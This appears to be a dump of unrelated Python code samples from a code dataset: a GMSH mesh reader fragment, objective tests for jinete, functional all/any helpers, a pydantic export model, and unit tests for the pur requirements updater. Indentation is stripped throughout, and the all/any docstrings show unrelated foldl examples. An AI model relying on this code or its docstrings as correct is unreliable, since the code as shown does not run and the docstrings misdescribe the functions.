@retval verts [@c numpy.ndarray]: Vertex list
"""
with open(self.name, 'rb') as f:
if f.readline() != '$MeshFormat\n':
raise ValueError('Missing or bad GMSH file section header')
version, file_type, data_size = f.readline().split()
if version != GmshFileReader.__VERSION:
raise ValueError('Missing or bad GMSH file version number')
if file_type != GmshFileReader.__FILE_TYPE:
raise ValueError('Missing or bad GMSH file type')
if data_size != GmshFileReader.__DATA_SIZE:
raise ValueError('Missing or bad GMSH data size')
one = struct.unpack('i', f.read(4))[0]
if one & (1 << (8*4-1)):
raise ValueError('Endianness of GMSH file and system differ')
elif one != 1:
raise ValueError('Could not read GMSH endianness identifier')
f.read(1)
if f.readline() != '$EndMeshFormat\n':
raise ValueError('Missing or bad GMSH file section footer')
if f.readline() != '$Nodes\n':
raise ValueError('Missing or bad GMSH file section header')
num_verts = int(f.readline())
verts = numpy.empty((num_verts, GmshFileReader.__DIM))
for i in xrange(num_verts):
struct.unpack('i', f.read(4))
verts[i, :] = struct.unpack('%dd' % GmshFileReader.__DIM,
f.read(int(GmshFileReader.__DATA_SIZE) \
*GmshFileReader.__DIM))
f.read(1)
if f.readline() != '$EndNodes\n':
raise ValueError('Missing or bad GMSH file section footer')
if f.readline() != '$Elements\n':
raise ValueError('Missing or bad GMSH file section header')
num_elts = int(f.readline())
elts = numpy.zeros((num_elts, GmshFileReader.__MAX_VERT),
dtype=numpy.int)
elts_read = 0
while elts_read < num_elts:
elt_type, num_elts_following, num_tags = \
struct.unpack('3i', f.read(3*4))
if elt_type == GmshElement.TRIANGLE:
elt_verts = 3
elif elt_type == GmshElement.QUAD:
elt_verts = 4
else:
raise ValueError('Invalid element type')
for j in xrange(num_elts_following):
struct.unpack('%di' % (num_tags + 1),
f.read(4*(num_tags + 1)))
for k in xrange(elt_verts):
elts[elts_read, k] = struct.unpack('i', f.read(4))[0]
elts_read += 1
if all(elts[:, -1] == 0):
elts = elts[:, :-1]
elts = elts[~numpy.all(elts == 0, axis=1)]
elts -= 1
return elts, verts
|
StarcoderdataPython
|
5095409
|
import unittest
import jinete as jit
from .abc import (
TestObjective,
)
class TestDialARideObjective(TestObjective):
def test_creation(self):
objective = jit.DialARideObjective()
self.assertEqual('Dial-a-Ride', objective.name)
def test_result(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.result),
)
def test_planning(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.planning),
)
def test_route(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.route),
)
def test_stop(self):
objective = jit.DialARideObjective()
self.assertEqual(
(1, -2.0),
objective.optimization_function(self.stop),
)
def test_planning_trip(self):
objective = jit.DialARideObjective()
self.assertEqual(
(1, -2.0),
objective.optimization_function(self.planned_trip),
)
def test_best(self):
objective = jit.DialARideObjective()
self.assertEqual(
next(self.route.planned_trips),
objective.best(*self.route.planned_trips),
)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9677722
|
<reponame>oniani/pyfunctional
"""
This module implements all and an
functions from functional programming.
The implementations are based on all and any
functions of the Haskell programming language.
Author : <NAME>
Date : 04/23/2019
License: MIT
"""
from sys import setrecursionlimit
from typing import Callable, Sequence, Any
from pyfunctional.fold import foldr
setrecursionlimit(1_000_000)
def all(fun: Callable[[Any], bool], seq: Sequence[Any]) -> bool:
"""Implementation of all in Python3.
This is an implementation of any function
from functional programming. See examples
below.
>>> foldl((lambda x, _: x + 1), 0, [0, 1, 2, 3, 4])
5
>>> foldl((lambda x, y: x + y), 0, [0, 1, 2, 3, 4])
10
"""
return foldr((lambda x, y: x and y), True, list(map(fun, seq)))
def any(fun: Callable[[Any], bool], seq: Sequence[Any]) -> bool:
"""Implementation of any in Python3.
This is an implementation of any function
from functional programming. See examples
below.
>>> foldl((lambda x, _: x + 1), 0, [0, 1, 2, 3, 4])
5
>>> foldl((lambda x, y: x + y), 0, [0, 1, 2, 3, 4])
10
"""
return foldr((lambda x, y: x or y), False, list(map(fun, seq)))
|
StarcoderdataPython
|
3220609
|
import logging
from enum import Enum
from datetime import date
from pydantic import Field, root_validator
from typing import List, Optional
from .base import SnakeModel
logger = logging.getLogger(__name__)
class ExportDataType(str, Enum):
raw_data = "raw_data"
occupancy = "occupancy"
social_distancing = "social-distancing"
facemask_usage = "facemask-usage"
in_out = "in-out"
dwell_time = "dwell-time"
all_data = "all_data"
class ExportDTO(SnakeModel):
areas: Optional[List[str]] = Field([], example=["area1", "area2", "area3"])
all_areas: Optional[bool] = Field(False, example=True)
cameras: Optional[List[str]] = Field([], example=["camera1", "camera2"])
all_cameras: Optional[bool] = Field(False, example=True)
from_date: Optional[date] = Field(None, example="2020-12-01")
to_date: Optional[date] = Field(None, example="2020-12-02")
data_types: List[ExportDataType] = Field(example=["all_data"])
@root_validator
def validate_dates(cls, values):
from_date = values.get("from_date")
to_date = values.get("to_date")
if not any([from_date, to_date]):
# No dates were sent, export data from the beginning of the times
return values
elif not from_date or not to_date:
# Only one date was sent. It's an invalid range
raise ValueError("Invalid range of dates")
elif from_date > to_date:
raise ValueError("Invalid range of dates")
return values
@root_validator
def validate_entities(cls, values):
if not any([values.get("areas"), values.get("all_areas"), values.get("cameras"),
values.get("all_cameras")]):
logger.info("No cameras or areas were provided.")
raise ValueError("No cameras or areas were provided. You need to provide unless one camera or "
"area to call the export endpoint.")
return values
|
StarcoderdataPython
|
6532059
|
# -*- coding: utf-8 -*-
import os
import shutil
import tempfile
from pur import pur, update_requirements, __version__
from click.testing import CliRunner
from pip._internal.index import InstallationCandidate, PackageFinder, Link
from pip._internal.req.req_install import Version
from . import utils
from .utils import u
class PurTestCase(utils.TestCase):
def setUp(self):
self.runner = CliRunner()
self.maxDiff = None
def test_help_contents(self):
args = ['--help']
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
self.assertIn('pur', u(result.output))
self.assertIn('Usage', u(result.output))
self.assertIn('Options', u(result.output))
def test_version(self):
args = ['--version']
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "pur, version {0}\n".format(__version__)
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
def test_updates_package(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_without_command_line(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = {
'input_file': requirements,
}
expected_result = {
'current': Version('0.9'),
'updated': True,
'latest': Version('0.10.1'),
'message': 'Updated flask: 0.9 -> 0.10.1',
'package': 'flask',
}
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = update_requirements(**args)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
self.assertEquals(result['flask'][0], expected_result)
def test_updates_package_in_nested_requirements(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_updates_package_in_nested_requirements_without_command_line(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = {
'input_file': requirements,
}
expected_result = {
'current': Version('0.9'),
'updated': True,
'latest': Version('0.10.1'),
'message': 'Updated readtime: 0.9 -> 0.10.1',
'package': 'readtime',
}
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
expected_requirements_nested = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = update_requirements(**args)
self.assertEquals(open(requirements).read(), expected_requirements)
self.assertEquals(open(requirements_nested).read(), expected_requirements_nested)
self.assertEquals(result['readtime'][0], expected_result)
def test_requirements_long_option_accepted(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['--requirement', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_to_output_file(self):
tempdir = tempfile.mkdtemp()
output = os.path.join(tempdir, 'output.txt')
previous = open('tests/samples/requirements.txt').read()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--output', output]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open('tests/samples/requirements.txt').read(), previous)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(output).read(), expected_requirements)
def test_updates_nested_requirements_to_output_file(self):
tempdir = tempfile.mkdtemp()
tempdir = tempfile.mkdtemp()
output = os.path.join(tempdir, 'output.txt')
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '--output', output]
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
expected_requirements = expected_requirements.replace('-r requirements-nested.txt\n', open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read())
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(requirements_nested).read(), open('tests/samples/requirements-nested.txt').read())
self.assertEquals(open(requirements).read(), open('tests/samples/requirements-with-nested-reqfile.txt').read())
self.assertEquals(open(output).read(), expected_requirements)
def test_exit_code_from_no_updates(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-up-to-date.txt', requirements)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 10)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 10)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_exit_code_from_some_updates(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 11)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 11)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_exit_code_from_nested_requirements_file(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 11)
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 11)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_no_recursive_option(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '-n']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements-with-nested-reqfile.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/requirements-nested.txt').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_skip_package(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '-s', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated Alembic: 0.9 -> 0.10.1\nUpdated sqlalchemy: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_skip_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 12.0 -> 12.1.3\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_minor').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_skips(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_minor_skips_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--minor', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.0.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 12.0 -> 12.0.3\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_patch').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_skips(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_patch_skips_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--patch', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '12.1.3'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_only_stable_versions_selected(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_pre_upgrades(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--pre', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 13.0.0.dev0\nUpdated flask: 12.0 -> 13.0.0.dev0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_pre_release').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_pre_upgrades_with_wildcard(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--pre', '*']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '13.0.0.dev0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 13.0.0.dev0\nUpdated flask: 12.0 -> 13.0.0.dev0\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_pre_release').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_skip_multiple_packages(self):
requirements = 'tests/samples/requirements-multiple.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '-s', 'flask, alembic , SQLAlchemy']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open(requirements).read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_only(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-multiple.txt', requirements)
args = ['-r', requirements, '--only', 'flask']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_only').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_only_multiple_packages(self):
requirements = 'tests/samples/requirements-multiple.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile, '--only', 'flask, sqlalchemy']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nUpdated sqlalchemy: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_only_multiple_packages').read()
self.assertEquals(open(tmpfile).read(), expected_requirements)
def test_updates_package_with_no_version_specified(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '-f']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nUpdated flask: Unknown -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_with_no_version_specified').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_invalid_package(self):
requirements = 'tests/samples/requirements.txt'
tempdir = tempfile.mkdtemp()
tmpfile = os.path.join(tempdir, 'requirements.txt')
shutil.copy(requirements, tmpfile)
args = ['-r', tmpfile]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
mock_find_all_candidates.return_value = []
result = self.runner.invoke(pur, args)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(tmpfile).read(), open(requirements).read())
def test_no_arguments(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = []
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
with self.cd(tempdir):
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_no_arguments_and_no_requirements_file(self):
tempdir = tempfile.mkdtemp()
args = []
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
with self.cd(tempdir):
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 1)
expected_output = "Error: Could not open requirements file: [Errno 2] No such file or directory: 'requirements.txt'\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 1)
def test_updates_package_with_number_in_name(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-version-in-name.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'package1'
version = '2.0'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated package1: 1 -> 2.0\nAll requirements up-to-date.\n"
